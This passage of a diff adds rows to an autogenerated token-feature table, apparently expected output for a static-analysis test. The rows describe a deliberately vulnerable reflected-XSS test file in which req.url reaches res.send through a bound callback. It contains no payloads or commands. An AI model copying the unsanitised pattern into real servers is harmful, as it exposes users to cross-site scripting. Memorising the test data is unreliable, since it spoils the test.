3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:9:2 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:9:2 | this | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | 'arguments' object of function sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | 'arguments' object of function sendResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | 'arguments' object of function sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | 'arguments' object of function sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | 'arguments' object of function sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | exceptional return of function sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | exceptional return of function sendResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | exceptional return of function sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | exceptional return of function sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | exceptional return of function sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | functio ... OK\\n } | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | functio ... OK\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | functio ... OK\\n } | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | functio ... OK\\n } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | functio ... OK\\n } | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | return of function sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | return of function sendResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | return of function sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | return of function sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:11:3 | return of function sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:9:12:9:23 | sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:9:12:9:23 | sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:9:12:9:23 | sendResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:9:12:9:23 | sendResponse | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:9:12:9:23 | sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:9:12:9:23 | sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:9:12:9:23 | sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:9:12:9:23 | sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:9:12:9:23 | sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:9:12:9:23 | sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:9:25:9:25 | x | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:9:25:9:25 | x | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:9:25:9:25 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:9:25:9:25 | x | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:9:25:9:25 | x | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:9:25:9:25 | x | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:9:25:9:25 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:9:25:9:25 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:9:25:9:25 | x | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:9:25:9:25 | x | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:9:28:9:28 | y | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:9:28:9:28 | y | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:9:28:9:28 | y | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:9:28:9:28 | y | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:9:28:9:28 | y | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:9:28:9:28 | y | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:9:28:9:28 | y | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:9:28:9:28 | y | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:9:28:9:28 | y | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:9:28:9:28 | y | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:7 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:7 | res | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:7 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:7 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:12 | res.send | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:12 | res.send | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:12 | res.send | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:12 | res.send | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:19 | exceptional return of res.send(x + y) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:19 | exceptional return of res.send(x + y) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:19 | exceptional return of res.send(x + y) | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:19 | exceptional return of res.send(x + y) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:19 | exceptional return of res.send(x + y) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:19 | res.send(x + y) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:19 | res.send(x + y) | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:19 | res.send(x + y) | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:19 | res.send(x + y) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:10:5:10:19 | res.send(x + y) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:10:9:10:12 | send | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:10:9:10:12 | send | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:10:9:10:12 | send | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:10:9:10:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:10:9:10:12 | send | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:10:14:10:14 | x | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:10:14:10:14 | x | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:10:14:10:14 | x | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:10:14:10:14 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:10:14:10:14 | x | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:10:14:10:14 | x | stringConcatenatedWith | -endpoint- y | | autogenerated/Xss/ReflectedXss/partial.js:10:14:10:18 | x + y | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/partial.js:10:14:10:18 | x + y | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:10:14:10:18 | x + y | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | @@ -21588,6 +143786,52 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:10:14:10:18 | x + y | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:10:14:10:18 | x + y | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:10:14:10:18 | x + y | receiverName | res | +| autogenerated/Xss/ReflectedXss/partial.js:10:18:10:18 | y | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:10:18:10:18 | y | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:10:18:10:18 | y | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:10:18:10:18 | y | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:10:18:10:18 | y | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:10:18:10:18 | y | stringConcatenatedWith | x -endpoint- | +| autogenerated/Xss/ReflectedXss/partial.js:13:7:13:14 | callback | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:13:7:13:14 | callback | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:13:7:13:14 | callback | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:13:7:13:14 | callback | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:13:7:13:14 | callback | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:13:7:13:49 | callbac ... eq.url) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:13:7:13:49 | callbac ... eq.url) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:13:7:13:49 | callbac ... eq.url) | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:13:7:13:49 | callbac ... eq.url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:13:7:13:49 | callbac ... eq.url) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:13:7:13:49 | callback | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:13:7:13:49 | callback | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:13:7:13:49 | callback | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:13:7:13:49 | callback | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:13:7:13:49 | callback | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:29 | sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:29 | sendResponse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:29 | sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:29 | sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:29 | sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:34 | sendResponse.bind | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:34 | sendResponse.bind | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:34 | sendResponse.bind | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:34 | sendResponse.bind | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:34 | sendResponse.bind | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:49 | exceptional return of sendRes ... eq.url) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:49 | exceptional return of sendRes ... eq.url) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:49 | exceptional return of sendRes ... eq.url) | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:49 | exceptional return of sendRes ... eq.url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:49 | exceptional return of sendRes ... eq.url) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:49 | sendRes ... eq.url) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:49 | sendRes ... eq.url) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:49 | sendRes ... eq.url) | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:49 | sendRes ... eq.url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:13:18:13:49 | sendRes ... eq.url) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:13:31:13:34 | bind | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:13:31:13:34 | bind | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:13:31:13:34 | bind | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:13:31:13:34 | bind | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:13:31:13:34 | bind | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:13:36:13:39 | null | CalleeFlexibleAccessPath | sendResponse.bind | | autogenerated/Xss/ReflectedXss/partial.js:13:36:13:39 | null | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:13:36:13:39 | null | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | @@ -21596,6 +143840,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:13:36:13:39 | null | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:13:36:13:39 | null | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:13:36:13:39 | null | receiverName | sendResponse | +| autogenerated/Xss/ReflectedXss/partial.js:13:42:13:44 | req | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:13:42:13:44 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:13:42:13:44 | req | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:13:42:13:44 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:13:42:13:44 | req | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:13:42:13:48 | req.url | CalleeFlexibleAccessPath | sendResponse.bind | | autogenerated/Xss/ReflectedXss/partial.js:13:42:13:48 | req.url | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/partial.js:13:42:13:48 | req.url | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | @@ -21604,6 +143853,66 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:13:42:13:48 | req.url | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:13:42:13:48 | req.url | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:13:42:13:48 | req.url | receiverName | sendResponse | +| autogenerated/Xss/ReflectedXss/partial.js:13:46:13:48 | url | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:13:46:13:48 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:13:46:13:48 | url | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:13:46:13:48 | url | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:13:46:13:48 | url | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:11 | [1, 2, 3] | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:11 | [1, 2, 3] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:11 | [1, 2, 3] | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:11 | [1, 2, 3] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:11 | [1, 2, 3] | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:19 | [1, 2, 3].forEach | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:19 | [1, 2, 3].forEach | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:19 | [1, 2, 3].forEach | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:19 | [1, 2, 3].forEach | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:19 | [1, 2, 3].forEach | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:29 | [1, 2, ... llback) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:29 | [1, 2, ... llback) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:29 | [1, 2, ... llback) | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:29 | [1, 2, ... llback) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:29 | [1, 2, ... llback) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:29 | exceptional return of [1, 2, ... llback) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:29 | exceptional return of [1, 2, ... llback) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:29 | exceptional return of [1, 2, ... llback) | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:29 | exceptional return of [1, 2, ... llback) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:14:3:14:29 | exceptional return of [1, 2, ... llback) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:14:4:14:4 | 1 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:14:4:14:4 | 1 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:14:4:14:4 | 1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:14:4:14:4 | 1 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:14:4:14:4 | 1 | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:14:4:14:4 | 1 | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:14:4:14:4 | 1 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:14:4:14:4 | 1 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:14:4:14:4 | 1 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:14:4:14:4 | 1 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:14:7:14:7 | 2 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:14:7:14:7 | 2 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:14:7:14:7 | 2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:14:7:14:7 | 2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:14:7:14:7 | 2 | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:14:7:14:7 | 2 | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:14:7:14:7 | 2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:14:7:14:7 | 2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:14:7:14:7 | 2 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:14:7:14:7 | 2 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:14:10:14:10 | 3 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:14:10:14:10 | 3 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:14:10:14:10 | 3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:14:10:14:10 | 3 | contextSurroundingFunctionParameters | (req, res) | +| 